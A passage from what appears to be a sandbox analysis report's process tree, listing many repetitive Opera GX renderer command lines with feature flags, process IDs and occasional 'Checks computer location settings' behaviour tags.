--with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --field-trial-handle=9020,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3272 /prefetch:12⤵
- Checks computer location settings
PID:6936
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --field-trial-handle=8864,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8972 /prefetch:12⤵PID:6596
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --field-trial-handle=10004,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6008 /prefetch:12⤵
- Checks computer location settings
PID:5496
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --field-trial-handle=9412,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8612 /prefetch:12⤵PID:5104
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --field-trial-handle=6512,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5352 /prefetch:12⤵
- Checks computer location settings
PID:5168
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --field-trial-handle=5360,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7408 /prefetch:12⤵
- Checks computer location settings
PID:7336
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --field-trial-handle=9300,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7608 /prefetch:12⤵PID:7344
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --field-trial-handle=6448,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6816 /prefetch:12⤵
- Checks computer location settings
PID:4580
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --field-trial-handle=6416,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9316 /prefetch:12⤵
- Checks computer location settings
PID:7800
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=128 --field-trial-handle=3736,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6476 /prefetch:12⤵PID:5900
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --field-trial-handle=8552,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7892 /prefetch:12⤵PID:7720
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=130 --field-trial-handle=9984,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3168 /prefetch:12⤵PID:6232
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --field-trial-handle=9836,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9132 /prefetch:12⤵
- Checks computer location settings
PID:3656
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=132 --field-trial-handle=6152,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9576 /prefetch:12⤵PID:7956
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --field-trial-handle=3488,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9852 /prefetch:12⤵PID:7064
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --field-trial-handle=8628,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8592 /prefetch:12⤵PID:7372
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on 